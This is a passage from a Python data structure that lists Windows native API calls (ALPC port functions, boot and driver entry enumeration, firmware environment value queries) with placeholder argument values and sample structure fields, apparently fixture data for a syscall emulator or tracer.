\"NtAlpcDeleteSectionView\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00400000\",\r\n \"additionalComment\": \"PVOID ViewBase (example mapped base address)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"__reserved ULONG (must be zero)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000cafe\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAlpcDeleteSecurityContext\": {\r\n \"ntFunc\": \"NtAlpcDeleteSecurityContext\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0000beef\",\r\n \"additionalComment\": \"HANDLE ContextHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"__reserved ULONG (must be zero)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000cafe\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAlpcDisconnectPort\": {\r\n \"ntFunc\": \"NtAlpcDisconnectPort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG Flags (ALPC_DISCONNECT_SEND_NOTIFICATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000cafe\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAlpcImpersonateClientOfPort\": {\r\n \"ntFunc\": \"NtAlpcImpersonateClientOfPort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"__reserved PVOID (must be None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to PORT_MESSAGE (dummy pointer)\",\r\n \"structurePointer\": \"PORT_MESSAGE\",\r\n \"structureRef\": \"struct26\",\r\n \"structureValueExpectations\": \"Message header and client information.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000cafe\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct26\": {\r\n \"type\": \"PORT_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"u1.s1.DataLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Length of message data\"\r\n },\r\n {\r\n \"fieldName\": \"u1.s1.TotalLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0030\",\r\n \"fieldComment\": \"Total length including header\"\r\n },\r\n {\r\n \"fieldName\": \"u2.s2.Type\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0001\",\r\n \"fieldComment\": \"Message type (e.g., LPC_REQUEST)\"\r\n },\r\n {\r\n \"fieldName\": \"u2.s2.DataInfoOffset\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Offset to data info (if any)\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId.UniqueProcess\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x99994444\",\r\n \"fieldComment\": \"Dummy process ID\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId.UniqueThread\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x88883333\",\r\n \"fieldComment\": \"Dummy thread ID\"\r\n },\r\n {\r\n \"fieldName\": \"MessageId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00001234\",\r\n \"fieldComment\": \"Message identifier\"\r\n },\r\n {\r\n \"fieldName\": \"ClientViewSize\",\r\n \"fieldType\": \"SIZE_T\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Typically zero unless using views\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAlpcOpenSenderProcess\": {\r\n \"ntFunc\": \"NtAlpcOpenSenderProcess\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None for POBJECT_ATTRIBUTES (optional, commonly None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Optional; typically None unless filtering by object attributes.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0FFF\",\r\n \"additionalComment\": \"ACCESS_MASK Access (PROCESS_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Reserved ULONG (must be zero)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to PORT_MESSAGE (dummy pointer, required)\",\r\n \"structurePointer\": \"PORT_MESSAGE\",\r\n \"structureRef\": \"struct27\",\r\n \"structureValueExpectations\": \"PORT_MESSAGE structure describing the ALPC message.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to HANDLE ProcessHandle (dummy pointer, receives process handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct27\": {\r\n \"type\": \"PORT_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"u1.s1.TotalLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Total length of the message\"\r\n },\r\n {\r\n \"fieldName\": \"u1.s1.DataLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0018\",\r\n \"fieldComment\": \"Length of the data\"\r\n },\r\n {\r\n \"fieldName\": \"u2.s2.Type\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0001\",\r\n \"fieldComment\": \"Message type\"\r\n },\r\n {\r\n \"fieldName\": \"u2.s2.DataInfoOffset\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Offset to data info\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId.UniqueProcess\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x99990001\",\r\n \"fieldComment\": \"Dummy process ID\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId.UniqueThread\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x99990002\",\r\n \"fieldComment\": \"Dummy thread ID\"\r\n },\r\n {\r\n \"fieldName\": \"MessageId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Message identifier\"\r\n },\r\n {\r\n \"fieldName\": \"ClientViewSize\",\r\n \"fieldType\": \"SIZE_T\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No client view\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAlpcOpenSenderThread\": {\r\n \"ntFunc\": \"NtAlpcOpenSenderThread\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None for POBJECT_ATTRIBUTES (optional, commonly None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Optional; typically None unless filtering by object attributes.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00100020\",\r\n \"additionalComment\": \"ACCESS_MASK Access (THREAD_QUERY_INFORMATION | THREAD_SUSPEND_RESUME)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Reserved ULONG (must be zero)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to PORT_MESSAGE (dummy pointer, required)\",\r\n \"structurePointer\": \"PORT_MESSAGE\",\r\n \"structureRef\": \"struct28\",\r\n \"structureValueExpectations\": \"PORT_MESSAGE structure describing the ALPC message.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000555\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to HANDLE ThreadHandle (dummy pointer, receives thread handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct28\": {\r\n \"type\": \"PORT_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"u1.s1.TotalLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Total length of the message\"\r\n },\r\n {\r\n \"fieldName\": \"u1.s1.DataLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0018\",\r\n \"fieldComment\": \"Length of the data\"\r\n },\r\n {\r\n \"fieldName\": \"u2.s2.Type\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0002\",\r\n \"fieldComment\": \"Message type\"\r\n },\r\n {\r\n \"fieldName\": \"u2.s2.DataInfoOffset\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Offset to data info\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId.UniqueProcess\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x99990003\",\r\n \"fieldComment\": \"Dummy process ID\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId.UniqueThread\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x99990004\",\r\n \"fieldComment\": \"Dummy thread ID\"\r\n },\r\n {\r\n \"fieldName\": \"MessageId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"Message identifier\"\r\n },\r\n {\r\n \"fieldName\": \"ClientViewSize\",\r\n \"fieldType\": \"SIZE_T\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No client view\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAlpcQueryInformation\": {\r\n \"ntFunc\": \"NtAlpcQueryInformation\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer, optional)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000020\"\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG Length (buffer size, 32 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to output buffer (dummy pointer, receives information)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ALPC_PORT_INFORMATION_CLASS PortInformationClass (AlpcBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000666\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAlpcQueryInformationMessage\": {\r\n \"ntFunc\": \"NtAlpcQueryInformationMessage\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer, optional)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG Length (buffer size, 16 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to output buffer (dummy pointer, receives information)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ALPC_MESSAGE_INFORMATION_CLASS MessageInformationClass (AlpcMessageBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to PORT_MESSAGE (dummy pointer, required)\",\r\n \"structurePointer\": \"PORT_MESSAGE\",\r\n \"structureRef\": \"struct29\",\r\n \"structureValueExpectations\": \"PORT_MESSAGE structure describing the ALPC message.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000777\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct29\": {\r\n \"type\": \"PORT_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"u1.s1.TotalLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Total length of the message\"\r\n },\r\n {\r\n \"fieldName\": \"u1.s1.DataLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0008\",\r\n \"fieldComment\": \"Length of the data\"\r\n },\r\n {\r\n \"fieldName\": \"u2.s2.Type\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0003\",\r\n \"fieldComment\": \"Message type\"\r\n },\r\n {\r\n \"fieldName\": \"u2.s2.DataInfoOffset\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Offset to data info\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId.UniqueProcess\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x99990005\",\r\n \"fieldComment\": \"Dummy process ID\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId.UniqueThread\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x99990006\",\r\n \"fieldComment\": \"Dummy thread ID\"\r\n },\r\n {\r\n \"fieldName\": \"MessageId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000003\",\r\n \"fieldComment\": \"Message identifier\"\r\n },\r\n {\r\n \"fieldName\": \"ClientViewSize\",\r\n \"fieldType\": \"SIZE_T\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No client view\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAlpcRevokeSecurityContext\": {\r\n \"ntFunc\": \"NtAlpcRevokeSecurityContext\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000888\",\r\n \"additionalComment\": \"HANDLE ContextHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Reserved ULONG (must be zero)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000999\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAlpcSendWaitReceivePort\": {\r\n \"ntFunc\": \"NtAlpcSendWaitReceivePort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for PLARGE_INTEGER Time_Out (no timeout specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for PALPC_MESSAGE_ATTRIBUTES ReceiveMessageAttributes (no receive attributes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for PULONG BufferLength (no receive buffer length)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for PPORT_MESSAGE ReceiveMessage (no receive message buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for PALPC_MESSAGE_ATTRIBUTES SendMessageAttributes (no send attributes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for PPORT_MESSAGE SendMessage (no send message buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Flags = 0 (no special flags)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None PortHandle (no port specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAlpcSetInformation\": {\r\n \"ntFunc\": \"NtAlpcSetInformation\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Length = 0 (no information provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for PortInformation (no information buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PortInformationClass = 0 (unspecified information class)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None PortHandle (no port specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtEnumerateBootEntries\": {\r\n \"ntFunc\": \"NtEnumerateBootEntries\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for PULONG BufferLength (no buffer length provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for Buffer (no buffer provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtEnumerateDriverEntries\": {\r\n \"ntFunc\": \"NtEnumerateDriverEntries\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for PULONG BufferLength (no buffer length provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for Buffer (no buffer provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtEnumerateSystemEnvironmentValuesEx\": {\r\n \"ntFunc\": \"NtEnumerateSystemEnvironmentValuesEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for PULONG BufferLength (no buffer length provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for Buffer (no buffer provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"InformationClass = 0 (Environment Value Information Class, unspecified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryBootEntryOrder\": {\r\n \"ntFunc\": \"NtQueryBootEntryOrder\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG Count (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000003\"\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to ULONG array Ids (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryBootOptions\": {\r\n \"ntFunc\": \"NtQueryBootOptions\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to ULONG BootOptionsLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000040\"\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to BOOT_OPTIONS structure (dummy pointer)\",\r\n \"structurePointer\": \"BOOT_OPTIONS\",\r\n \"structureRef\": \"struct30\",\r\n \"structureValueExpectations\": \"Version, Length, Timeout, CurrentBootEntryId, NextBootEntryId, HeadlessTerminal.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct30\": {\r\n \"type\": \"BOOT_OPTIONS\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Version\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Version 1\"\r\n },\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"Structure size\"\r\n },\r\n {\r\n \"fieldName\": \"Timeout\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x0000001e\",\r\n \"fieldComment\": \"30 seconds\"\r\n },\r\n {\r\n \"fieldName\": \"CurrentBootEntryId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Current boot entry ID\"\r\n },\r\n {\r\n \"fieldName\": \"NextBootEntryId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"Next boot entry ID\"\r\n },\r\n {\r\n \"fieldName\": \"HeadlessTerminal\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Not headless\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryDriverEntryOrder\": {\r\n \"ntFunc\": \"NtQueryDriverEntryOrder\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to ULONG Count (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000002\"\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to ULONG array Ids (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQuerySystemEnvironmentValueEx\": {\r\n \"ntFunc\": \"NtQuerySystemEnvironmentValueEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Optional pointer to ULONG (dummy pointer, optional parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to ULONG ValueLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000020\"\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to buffer for Value (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x41414141\"\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to GUID VendorGuid (dummy pointer)\",\r\n \"structurePointer\": \"GUID\",\r\n \"structureRef\": \"struct31\",\r\n \"structureValueExpectations\": \"Vendor GUID for the environment variable.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING VariableName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct32\",\r\n \"structureValueExpectations\": \"UNICODE_STRING describing the variable name.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct31\": {\r\n \"type\": \"GUID\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Data1\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x12345678\",\r\n \"fieldComment\": \"Sample GUID Data1\"\r\n },\r\n {\r\n \"fieldName\": \"Data2\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": 